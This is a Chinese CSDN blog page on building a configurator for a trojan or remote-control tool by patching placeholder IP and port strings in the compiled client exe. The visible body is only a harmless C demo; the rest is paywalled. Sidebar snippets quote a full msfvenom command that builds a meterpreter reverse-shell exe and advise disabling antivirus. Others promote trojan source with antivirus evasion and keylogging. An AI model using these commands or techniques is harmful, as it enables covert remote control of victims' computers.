通过直接读取修改exe文件的方式编写远控/木马配置器

最新推荐文章于 2024-05-02 17:17:39 发布
最新推荐文章于 2024-05-02 17:17:39 发布
阅读量3.5k 收藏 4
点赞数
分类专栏: windows系统编程 木马/远控编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/junbopengpeng/article/details/37915133
版权
本文介绍了如何通过直接修改原始受控端exe文件的方式来编写远控或木马的配置器。这种方法涉及到对可执行程序的机器码分析,使用工具如C32ASM查看内存区块,并在程序中实现对受控端配置信息的修改。文章通过代码示例和运行结果展示,详细阐述了配置过程。
摘要由CSDN通过智能技术生成

一般的远控或木马都有配置器,主要是为了方便木马的受控端的管理,至于配置器的编写有很多的方式,主要是直接修改原始的受控端的程序,有的方式是把受控端和配置信息都放到控制端程序的内部,在需要配置受控端的时候直接输入配置信息,生成受控端;也有的方式是在外部直接修改未配置信息的受控端程序。

下面我先介绍与实现第二种方式:

为了演示这种反方式,我编写了一个受控端demo程序:

#include "stdafx.h"

int main(int argc, char* argv[])
{
	char szIpAddress[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAA" ;
	char szPort[] =		 "BBBBBBBBBBBBBBBBBBBBBBBBBBBB" ;
	char szOtherInfo[] = "CCCCCCCCCCCCCCCCCCCCCCCCCCCC" ;

	printf("IP:%s\nPort:%s\nOther Information:%s\n" , szIpAddress , szPort , szOtherInfo  ) ;

	getchar() ;

	return 0;
}

这个程序很简单,主要是为了演示。在程序中有三个内存区块分别存放的是IP信息,端口信息以及其他信息,我们的目的就是修改这三个区块,把我们需要的IP和端口等信息替换到这三个部分。

最低0.47元/天 解锁文章
bobopeng
关注
专栏目录
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2755
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成的后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3994
msfvenom的使用
exe文件修改编辑
11-03
EXE文件修改工具,可以很方便的修改程序的图标,等等
一款好用的远程控制RAT源码,单exe
02-17
源码 目前一般的RAT远控软件都是dll版或者服务启动版,gh0st也是如此,本程序为gh0st的被控端单exe修改版(控制端我没上传,网上多得是),对过主动防御比较容易,已经做过一些免杀工作,常用的免杀技术如动态函数调用均有涉及,具体请看源码 注意,要编译成功,可能需要安装sdk
【web安全个人自学笔记】使用kali渗透工具生成远控木马
2301_78959801的博客
09-17 538
使用kali渗透工具生成远控木马
如何直接修改exe文件
热门推荐
晓阳 的专栏
03-31 8万+
在以前学习的时候,无法想象在没有源码的时候如何对exe文件添加功能,觉得简直不可思议,在了解汇编和反编译的一些知识后,原来这种想法是可以实现的。我们需要对exe文件进行直接修改,把我们的代码直接写入exe文件,这样就能实现我们的功能了。     当然,要想直接exe文件进行直接修改必须有较好的汇编基础,对反汇编技术有一定的基础。否则会很茫然的。     一般有两种方法可以对exe文件添加我们
golang学习之远程木马demo编写
05-16 1745
原理很简单,简单来说就是能远程执行windows命令,靶机主动连接我们的机,只完成了一部分,能远程执行一段简单的命令(例如关机shutdown -p),理论上讲应该完成1、远程执行命令 2、命令执行结果发回来3、互相传输文件,感觉后面的没必要继续深究了,能完成第一个功能,后续的就是照猫画虎,边查边写就完了,没啥难度,不想写了,继续看golang的其他内容了,以后再有闲工夫再补上。如果要去掉client端的黑框,编译的时候加个参数就好。
以资源形式导入dll和exe实现远控配置和dll辅助注入
bobopeng
08-05 2541
远控/木马编写过程
用python做一个木马_Python编程简单的木马程序(转载于乌云中)
weixin_39891272的博客
12-09 1342
Python编程简单的木马程序light·2015/01/26 10:070x00准备好了本文的内容仅用于研究和研究,不得用于非法目的!这一次,我们使用Python编写了一个简单的木马,它具有关键日志记录,屏幕截图和通讯功能。仍然选择Sublime text2 + JEDI(python自动完成插件)按代码,JEDI插件的安装和配置可以参考此处:/ tips /?id = 4413首先准备我们需要...
EXE文件编辑
03-21
EXE文件编辑 EXE文件编辑,修改EXE软件工具。好用(本机备份) 经典资料,吐血推荐。
EXE文件编辑....
05-06
有一个EXE文件编辑,能够完美修改普通vc6.0等生成的EXE文件图标,程序标题等(亲测有效),同时附带一个教程视频。
exe文件编辑工具
02-12
可以方便的查看和编辑exe文件EXE File英文全名executable file ,译作可执行文件,可移植可执行 (PE) 文件格式的文件,它可以加载到内存中,并由操作系统加载程序执行,是可在操作系统存储空间中浮动定位的可执行程序。
修改EXE文件的工具 免费
07-15
可以修改EXE文件的工具 免费下载 免费使用
zbot木马分析
u011636170的专栏
11-22 2558
木马属于zbot木马家族,并且此木马的免杀做的非常好。能过很好的逃过杀软的检测,而此木马对自己进行了很好的保护,经过了三个阶段才将自己释放出来。并添加了开机自启动。木马主要的四个阶段: 0x01:释放样本到临时文件夹,并启动0x02:释放文件到C:\Documents and Settings\Administrator\Application Data\目录,并且生成文件,设置开机自启动,然后启
网络安全技术新手入门 利用Kali Linux生成简单的远程控制木马_kali生成远程
最新发布
2401_84263434的博客
05-02 1424
输入命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.147 lport=9999 -f exe -o MyDemo.exe参数含义:-p:payload -f:format -o:output运行结果如下:查看病毒:1.关闭杀毒程序杀毒程序包括一些杀毒软件以及电脑本身的防毒程序因为杀毒软件五花八门所以读者门自行研究关闭,这里只演示电脑本身的杀毒程序的关闭tips:新手阶段一般都用windows
网络安全技术新手入门:利用Kali Linux生成简单的远程控制木马
weixin_56154577的博客
01-08 5792
本文对木马的生成过程讲的比较详细,适合对网络安全技术感兴趣的小伙伴们,读完本文之后,读者可以对木马的形成、传播、对靶机的控制流程有一个逻辑性的理解
【kali】生成木马并绑定正常软件实现远控
qq_20410657的博客
10-20 902
如果没有则需要进行安装。
使用C32asm编辑
blueseasand的专栏
07-13 6458
使用C32asm编辑:1。运行C32asm2,打开winreplace.exe文件3。将编辑模式切换到对应的HEX编辑,如图:在菜单的编辑--〉对应HEX编辑4。在HEX编辑模式下,切换编辑模式,如图:查看--〉编辑模式--〉普通模式5。将光标移动到要修改的地方,输入要修改的内容6。编辑完成后,保存 
SpringBoot配置文件读取详解
"本文将深入探讨SpringBoot如何便捷地读取配置文件,对比传统Spring项目中的配置文件读取方式,解析SpringBoot的简化方法,并通过示例代码进行详细讲解。" 在传统的Spring项目中,我们通常需要手动处理I/O流来读取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值